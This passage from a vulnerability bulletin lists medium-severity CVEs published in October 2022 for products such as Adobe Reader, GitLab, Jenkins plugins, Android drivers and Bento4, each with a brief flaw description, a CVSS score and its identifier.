adobe — acrobat_reader_dc Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-38449
MISC
adobe — acrobat_reader_dc Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-42342
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction, but does require administrator privileges. 2022-10-14 4.9 CVE-2022-38423
MISC
adobe — commerce Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution. 2022-10-14 5.4 CVE-2022-35698
MISC
adobe — commerce Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the availability of a user’s minor feature. Exploitation of this issue does not require user interaction. 2022-10-14 5.3 CVE-2022-35689
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-38443
MISC
aethon — tug_home_base_server Aethon TUG Home Base Server versions prior to version 24 are affected by an unauthenticated attacker who can freely access hashed user credentials. 2022-10-21 6.1 CVE-2022-1059
MISC
aethon — tug_home_base_server Aethon TUG Home Base Server versions prior to version 24 are affected by an unauthenticated attacker who can freely access hashed user credentials. 2022-10-21 5.4 CVE-2022-27494
MISC
apache — isis Prior to 2.0.0-M9, it was possible for an end-user to set the value of an editable string property of a domain object to a value that would be rendered unchanged when the value was saved. In particular, the end-user could enter javascript or similar and this would be executed. As of this release, the inputted strings are properly escaped when rendered. 2022-10-19 6.1 CVE-2022-42466
MISC
MLIST
apache — isis When running in prototype mode, the h2 webconsole module (accessible from the Prototype menu) is automatically made available with the ability to directly query the database. It was felt that it is safer to require the developer to explicitly enable this capability. As of 2.0.0-M8, this can now be done using the ‘isis.prototyping.h2-console.web-allow-remote-access’ configuration property; the web console will be unavailable without setting this configuration. As an additional safeguard, the new ‘isis.prototyping.h2-console.generate-random-web-admin-password’ configuration parameter (enabled by default) requires that the administrator use a randomly generated password to use the console. The password is printed to the log as “webAdminPass: xxx” (where “xxx” is the password). To revert to the original behaviour, the administrator would therefore need to set these configuration parameters: isis.prototyping.h2-console.web-allow-remote-access=true and isis.prototyping.h2-console.generate-random-web-admin-password=false. Note also that the h2 webconsole is never available in production mode, so these safeguards are only to ensure that the webconsole is secured by default also in prototype mode. 2022-10-19 5.3 CVE-2022-42467
MISC
MLIST
asus — system_control_interface AsusSoftwareManager.exe in ASUS System Control Interface on ASUS personal computers (running Windows) allows a local user to write into the Temp directory and delete another more privileged file via SYSTEM privileges. This affects ASUS System Control Interface 3 before 3.1.5.0, AsusSoftwareManger.exe before 1.0.53.0, and AsusLiveUpdate.dll before 1.0.45.0. 2022-10-18 6 CVE-2022-36439
MISC
MISC
atlassian — jira_align The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request. 2022-10-14 4.9 CVE-2022-36802
MISC
axiosys — bento4 An issue was discovered in Bento4 v1.6.0-639. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp, as demonstrated by mp42aac. 2022-10-19 6.5 CVE-2022-43032
MISC
axiosys — bento4 An issue was discovered in Bento4 1.6.0-639. There is a bad free in the component AP4_HdlrAtom::~AP4_HdlrAtom() which allows attackers to cause a Denial of Service (DoS) via a crafted input. 2022-10-19 6.5 CVE-2022-43033
MISC
axiosys — bento4 An issue was discovered in Bento4 v1.6.0-639. There is a heap buffer overflow vulnerability in the AP4_BitReader::SkipBits(unsigned int) function in mp42ts. 2022-10-19 6.5 CVE-2022-43034
MISC
axiosys — bento4 An issue was discovered in Bento4 v1.6.0-639. There is a heap-buffer-overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac. 2022-10-19 6.5 CVE-2022-43035
MISC
axiosys — bento4 An issue was discovered in Bento4 1.6.0-639. There is a memory leak in the function AP4_File::ParseStream in /Core/Ap4File.cpp. 2022-10-19 6.5 CVE-2022-43037
MISC
axiosys — bento4 Bento4 v1.6.0-639 was discovered to contain a heap overflow via the AP4_BitReader::ReadCache() function in mp42ts. 2022-10-19 6.5 CVE-2022-43038
MISC
cashier_queuing_system_project — cashier_queuing_system A vulnerability, which was classified as problematic, has been found in SourceCodester Cashier Queuing System 1.0.1. This issue affects some unknown processing of the component User Creation Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-211187. 2022-10-18 6.1 CVE-2022-3580
MISC
cashier_queuing_system_project — cashier_queuing_system A vulnerability, which was classified as problematic, was found in SourceCodester Cashier Queuing System 1.0. Affected is an unknown function of the component Cashiers Tab. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-211188. 2022-10-18 6.1 CVE-2022-3581
MISC
changingtec — rava_certificate_validation_system RAVA certificate validation system has inadequate filtering for a URL parameter. An unauthenticated remote attacker can perform an SSRF attack to discover internal network topology based on the query response. 2022-10-18 5.3 CVE-2022-39055
MISC
chop-chop — pop-up_chop_chop Auth. Stored Cross-Site Scripting (XSS) in Pop-Up Chop Chop plugin <= 2.1.7 on WordPress. 2022-10-21 5.4 CVE-2022-41638
CONFIRM
CONFIRM
codedropz — drag_and_drop_multiple_file_upload_-_contact_form_7 The Drag and Drop Multiple File Upload WordPress plugin before 1.3.6.5 does not properly check for the upload size limit set in forms, taking the value from user input sent when submitting the form. As a result, attackers could control the file length limit and bypass the limit set by admins in the contact form. 2022-10-17 4.3 CVE-2022-3282
MISC
corsair — k63_firmware Missing AES encryption in Corsair K63 Wireless 3.1.3 allows physically proximate attackers to inject and sniff keystrokes via 2.4 GHz radio transmissions. 2022-10-19 6.8 CVE-2022-35860
MISC
MISC
MISC
designextreme — we’re_open The We’re Open! WordPress plugin before 1.42 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-17 4.8 CVE-2022-3139
MISC
devhubapp — devhub devhub 0.102.0 was discovered to contain a broken session control. 2022-10-17 5.4 CVE-2022-41542
MISC
MISC
MISC
MISC
easyvista — service_manager Cross Site Scripting (XSS) vulnerability in New equipment page in EasyVista Service Manager 2018.1.181.1 allows remote attackers to run arbitrary code via the notes field. 2022-10-20 5.4 CVE-2021-33231
MISC
MISC
enalean — tuleap Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions 12.9.99.228 and above, prior to 14.0.99.24, authorizations are not properly verified when updating the branch prefix used by the GitLab repository integration. Authenticated users can change the branch prefix of any of the GitLab repository integrations they can see via the REST endpoint `PATCH /gitlab_repositories/{id}`. This action should be restricted to Git administrators. This issue is patched in Tuleap Community Edition 14.0.99.24 and Tuleap Enterprise Edition 14.0-3. There are no known workarounds. 2022-10-19 5.4 CVE-2022-39233
MISC
CONFIRM
MISC
MISC
f5 — big-ip_application_security_manager In BIG-IP versions 16.1.x before 16.1.3, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5, and all versions of 13.1.x, and BIG-IQ versions 8.x before 8.2.0.1 and all versions of 7.x, when an SSL key is imported on a BIG-IP or BIG-IQ system, undisclosed input can cause MCPD to terminate. 2022-10-19 4.9 CVE-2022-41694
MISC
f5 — big-iq_centralized_management In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, 14.1.x before 14.1.5.1, and all versions of 13.1.x, and BIG-IQ all versions of 8.x and 7.x, an authenticated iControl REST user can cause an increase in memory resource utilization, via undisclosed requests. 2022-10-19 6.5 CVE-2022-41770
MISC
f5 — f5os-c In F5OS-A version 1.x before 1.1.0 and F5OS-C version 1.x before 1.4.0, a directory traversal vulnerability exists in an undisclosed location of the F5OS CLI that allows an attacker to read arbitrary files. 2022-10-19 5.5 CVE-2022-41780
MISC
fatcatapps — analytics_cat Auth. (admin+) Stored Cross-Site Scripting (XSS) in Fatcat Apps Analytics Cat plugin <= 1.0.9 on WordPress. 2022-10-21 4.8 CVE-2022-40311
CONFIRM
CONFIRM
fedoraproject — supybot-fedora supybot-fedora implements the command ‘refresh’, that refreshes the cache of all users from FAS. This takes quite a while to run, and zodbot stops responding to requests during this time. 2022-10-18 5.3 CVE-2020-15853
MISC
garage_management_system_project — garage_management_system A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php. 2022-10-20 5.4 CVE-2022-41358
MISC
MISC
MISC
MISC
MISC
git-scm — git Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source’s `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim’s machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`. 2022-10-19 5.5 CVE-2022-39253
CONFIRM
gitlab — gitlab A business logic issue in the handling of large repositories in all versions of GitLab CE/EE from 10.0 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2 allowed an authenticated and authorized user to exhaust server resources by importing a malicious project. 2022-10-17 6.5 CVE-2022-2455
MISC
MISC
CONFIRM
gitlab — gitlab A lack of length validation in Snippet descriptions in GitLab CE/EE affecting all versions prior to 15.1.6, 15.2 prior to 15.2.4 and 15.3 prior to 15.3.2 allows an authenticated attacker to create a maliciously large Snippet which, when requested with or without authentication, places excessive load on the server, potentially leading to Denial of Service. 2022-10-17 6.5 CVE-2022-2592
MISC
MISC
CONFIRM
gitlab — gitlab An issue has been discovered in the Import functionality of GitLab CE/EE affecting all versions starting from 14.4 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. It was possible for an authenticated user to read arbitrary projects’ content given the project’s ID. 2022-10-17 6.5 CVE-2022-3067
CONFIRM
MISC
MISC
gitlab — gitlab An unhandled exception in job log parsing in GitLab CE/EE affecting all versions prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows an attacker to prevent access to job logs 2022-10-17 6.5 CVE-2022-3279
MISC
MISC
CONFIRM
gitlab — gitlab Serialization of sensitive data in GitLab EE affecting all versions from 14.9 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 can leak sensitive information via cache 2022-10-17 6.5 CVE-2022-3291
CONFIRM
MISC
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 10.0 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. It was possible for an unauthorised user to create issues in a project. 2022-10-17 5.4 CVE-2022-3066
MISC
MISC
CONFIRM
gitlab — gitlab Lack of IP address checking in GitLab EE affecting all versions from 14.2 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows a group member to bypass IP restrictions when using a deploy token 2022-10-17 5.3 CVE-2022-3286
CONFIRM
MISC
gitlab — gitlab A cross-site scripting issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, 15.2 to 15.2.4 and 15.3 prior to 15.3.2. It was possible to exploit a vulnerability in setting the labels colour feature which could lead to a stored XSS that allowed attackers to perform arbitrary actions on behalf of victims at client side. 2022-10-17 4.8 CVE-2022-2865
CONFIRM
MISC
MISC
gitlab — gitlab An improper access control issue in GitLab CE/EE affecting all versions starting from 15.2 before 15.2.4, all versions from 15.3 before 15.3.2 allows disclosure of confidential information via the Incident timeline events. 2022-10-17 4.3 CVE-2022-2630
MISC
CONFIRM
MISC
gitlab — gitlab A potential DoS vulnerability was discovered in GitLab CE/EE versions starting from 10.7 before 15.1.5, all versions starting from 15.2 before 15.2.3, all versions starting from 15.3 before 15.3.1 that allowed an attacker to trigger high CPU usage via a specially crafted input added in the Commit message field. 2022-10-17 4.3 CVE-2022-2908
CONFIRM
MISC
MISC
gitlab — gitlab An improper access control issue in GitLab CE/EE affecting all versions starting before 15.1.6, all versions from 15.2 before 15.2.4, all versions from 15.3 before 15.3.2 allows disclosure of pipeline status to unauthorized users. 2022-10-17 4.3 CVE-2022-3030
MISC
MISC
CONFIRM
gitlab — gitlab A branch/tag name confusion in GitLab CE/EE affecting all versions prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows an attacker to manipulate pages where the content of the default branch would be expected. 2022-10-17 4.3 CVE-2022-3288
CONFIRM
MISC
MISC
gitlab — gitlab Email addresses were leaked in WebHook logs in GitLab EE affecting all versions from 9.3 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 2022-10-17 4.3 CVE-2022-3293
MISC
CONFIRM
gitlab — gitlab Improper access control in the GitLab CE/EE API affecting all versions starting from 12.8 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1, allowed editing of the approval rules via the API by an unauthorised user. 2022-10-17 4.3 CVE-2022-3325
MISC
CONFIRM
gitlab — gitlab It was possible for a guest user to read a todo targeting an inaccessible note in Gitlab CE/EE affecting all versions from 15.0 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1. 2022-10-17 4.3 CVE-2022-3330
MISC
CONFIRM
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 14.5 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. GitLab’s Zentao integration has an insecure direct object reference vulnerability that may be exploited by an attacker to leak Zentao project issues. 2022-10-17 4.3 CVE-2022-3331
MISC
CONFIRM
MISC
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 13.7 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. A user’s primary email may be disclosed to an attacker through group member events webhooks. 2022-10-17 4.3 CVE-2022-3351
MISC
MISC
CONFIRM
google — android In jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-2984
MISC
google — android In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-38671
MISC
google — android In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-38672
MISC
google — android In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-38673
MISC
google — android In gpu driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-38676
MISC
google — android In cell service, there is a missing permission check. This could lead to local denial of service in cell service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-38677
MISC
google — android In music service, there is a missing permission check. This could lead to local denial of service in music service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-38679
MISC
google — android In messaging service, there is a missing permission check. This could lead to local denial of service in messaging service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-38687
MISC
google — android In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-38688
MISC
google — android In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-38689
MISC
google — android In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-38690
MISC
google — android In messaging service, there is a missing permission check. This could lead to access unexpected provider in contacts service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-38697
MISC
google — android In Gallery service, there is a missing permission check. This could lead to local denial of service in Gallery service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-39103
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39105
MISC
google — android In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-39112
MISC
google — android In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-39113
MISC
google — android In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-39114
MISC
google — android In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-39115
MISC
google — android In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. 2022-10-14 5.5 CVE-2022-39117
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39120
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39121
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39122
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39123
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39124
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39125
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39126
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39127
MISC
google — android In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. 2022-10-14 5.5 CVE-2022-39128
MISC
gpac — gpac GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_meta_restore_items_ref at /isomedia/meta.c. 2022-10-19 5.5 CVE-2022-43039
MISC
gpac — gpac GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function BD_CheckSFTimeOffset at /bifs/field_decode.c. 2022-10-19 5.5 CVE-2022-43043
MISC
gpac — gpac GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_get_meta_item_info at /isomedia/meta.c. 2022-10-19 5.5 CVE-2022-43044
MISC
gpac — gpac GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_dump_vrml_sffield at /scene_manager/scene_dump.c. 2022-10-19 5.5 CVE-2022-43045
MISC
helpful_project — helpful The Helpful WordPress plugin before 4.5.26 puts the exported logs and feedbacks in a publicly accessible location with guessable names, which could allow attackers to download them and retrieve sensitive information such as IP, Names and Email Address depending on the plugin’s settings 2022-10-17 5.3 CVE-2022-2834
MISC
hospital_management_system_project — hospital_management_system PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php. 2022-10-21 5.4 CVE-2022-42205
MISC
hospital_management_system_project — hospital_management_system PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php. 2022-10-21 5.4 CVE-2022-42206
MISC
huawei — emui Uncaptured exceptions in the home screen module. Successful exploitation of this vulnerability may affect stability. 2022-10-14 5.3 CVE-2022-41587
MISC
hunter2_project — hunter2 An issue has been discovered in hunter2 affecting all versions before 2.1.0. Improper handling of auto-completion input allows an authenticated attacker to extract other users’ email addresses. 2022-10-17 6.5 CVE-2022-3540
CONFIRM
MISC
ikea — tradfri_gateway_e1526_firmware A single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI gateway unresponsive, such that connected lighting cannot be controlled with the IKEA Home Smart app and TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score: 6.5 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 2022-10-14 6.5 CVE-2022-39065
MISC
jenkins — 360_fireline Jenkins 360 FireLine Plugin 1.7.2 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. 2022-10-19 5.3 CVE-2022-43435
CONFIRM
MLIST
jenkins — compuware_source_code_download_for_endevor,_pds,_and_ispw Jenkins Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.12 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process. 2022-10-19 5.3 CVE-2022-43423
CONFIRM
MLIST
jenkins — compuware_strobe_measurement Jenkins Compuware Strobe Measurement Plugin 1.0.1 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2022-10-19 4.3 CVE-2022-43431
CONFIRM
MLIST
jenkins — compuware_topax_for_total_test Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process. 2022-10-19 5.3 CVE-2022-43428
CONFIRM
MLIST
jenkins — compuware_topaz_for_total_test Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2022-10-19 4.3 CVE-2022-43427
CONFIRM
MLIST
jenkins — compuware_topaz_utilities Jenkins Compuware Topaz Utilities Plugin 1.0.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process. 2022-10-19 5.3 CVE-2022-43422
CONFIRM
MLIST
jenkins — compuware_xpediter_code Jenkins Compuware Xpediter Code Coverage Plugin 1.0.7 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process. 2022-10-19 5.3 CVE-2022-43424
CONFIRM
MLIST
jenkins — contrast_continuous_application_security Jenkins Contrast Continuous Application Security Plugin 3.9 and earlier does not escape data returned from the Contrast service when generating a report, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control or modify Contrast service API responses. 2022-10-19 5.4 CVE-2022-43420
CONFIRM
MLIST
jenkins — custom_checkbox_parameter Jenkins Custom Checkbox Parameter Plugin 1.4 and earlier does not escape the name and description of Custom Checkbox Parameter parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-10-19 5.4 CVE-2022-43425
CONFIRM
MLIST
jenkins — generic_webhook_trigger Jenkins Generic Webhook Trigger Plugin 1.84.1 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. 2022-10-19 5.3 CVE-2022-43412
CONFIRM
MLIST
jenkins — gitlab Jenkins GitLab Plugin 1.5.35 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. 2022-10-19 5.3 CVE-2022-43411
CONFIRM
MLIST
jenkins — job_import Jenkins Job Import Plugin 3.5 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2022-10-19 4.3 CVE-2022-43413
CONFIRM
MLIST
jenkins — katalon Jenkins Katalon Plugin 1.0.32 and earlier stores API keys unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-10-19 6.5 CVE-2022-43419
CONFIRM
MLIST
jenkins — katalon Jenkins Katalon Plugin 1.0.32 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-10-19 4.3 CVE-2022-43417
CONFIRM
MLIST
jenkins — katalon A cross-site request forgery (CSRF) vulnerability in Jenkins Katalon Plugin 1.0.33 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-10-19 4.3 CVE-2022-43418
CONFIRM
MLIST
jenkins — neuvector_vulnerability_scanner Jenkins NeuVector Vulnerability Scanner Plugin 1.20 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. 2022-10-19 5.3 CVE-2022-43434
CONFIRM
MLIST
jenkins — nunit Jenkins NUnit Plugin 0.27 and earlier implements an agent-to-controller message that parses files inside a user-specified directory as test results, allowing attackers able to control agent processes to obtain test results from files in an attacker-specified directory on the Jenkins controller. 2022-10-19 5.3 CVE-2022-43414
CONFIRM
MLIST
jenkins — s3_explorer Jenkins S3 Explorer Plugin 1.0.8 and earlier does not mask the AWS_SECRET_ACCESS_KEY form field, increasing the potential for attackers to observe and capture it. 2022-10-19 5.3 CVE-2022-43426
CONFIRM
MLIST
jenkins — screenrecorder Jenkins ScreenRecorder Plugin 0.7 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. 2022-10-19 4.3 CVE-2022-43433
CONFIRM
MLIST
jenkins — stage_view Jenkins Pipeline: Stage View Plugin 2.26 and earlier does not correctly encode the ID of ‘input’ steps when using it to generate URLs to proceed or abort Pipeline builds, allowing attackers able to configure Pipelines to specify ‘input’ step IDs resulting in URLs that would bypass the CSRF protection of any target URL in Jenkins. 2022-10-19 6.5 CVE-2022-43408
CONFIRM
MLIST
jenkins — supporting_apis Jenkins Pipeline: Supporting APIs Plugin 838.va_3a_087b_4055b and earlier does not sanitize or properly encode URLs of hyperlinks sending POST requests in build logs, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create Pipelines. 2022-10-19 5.4 CVE-2022-43409
CONFIRM
MLIST
jenkins — tuleap_git_branch_source A missing permission check in Jenkins Tuleap Git Branch Source Plugin 3.2.4 and earlier allows unauthenticated attackers to trigger Tuleap projects whose configured repository matches the attacker-specified value. 2022-10-19 5.3 CVE-2022-43421
CONFIRM
MLIST
jenkins — xframium_builder Jenkins XFramium Builder Plugin 1.0.22 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. 2022-10-19 4.3 CVE-2022-43432
CONFIRM
MLIST
juniper — junos An Improper Check or Handling of Exceptional Conditions vulnerability in the processing of a malformed OSPF TLV in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated adjacent attacker to cause the periodic packet management daemon (PPMD) process to go into an infinite loop, which in turn can cause protocols and functions reliant on PPMD such as OSPF neighbor reachability to be impacted, resulting in a sustained Denial of Service (DoS) condition. The DoS condition persists until the PPMD process is manually restarted. This issue affects: Juniper Networks Junos OS: All versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S5; 19.3 versions prior to 19.3R3-S3; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S3-EVO; 21.1 versions prior to 21.1R2-EVO. 2022-10-18 6.5 CVE-2022-22224
CONFIRM
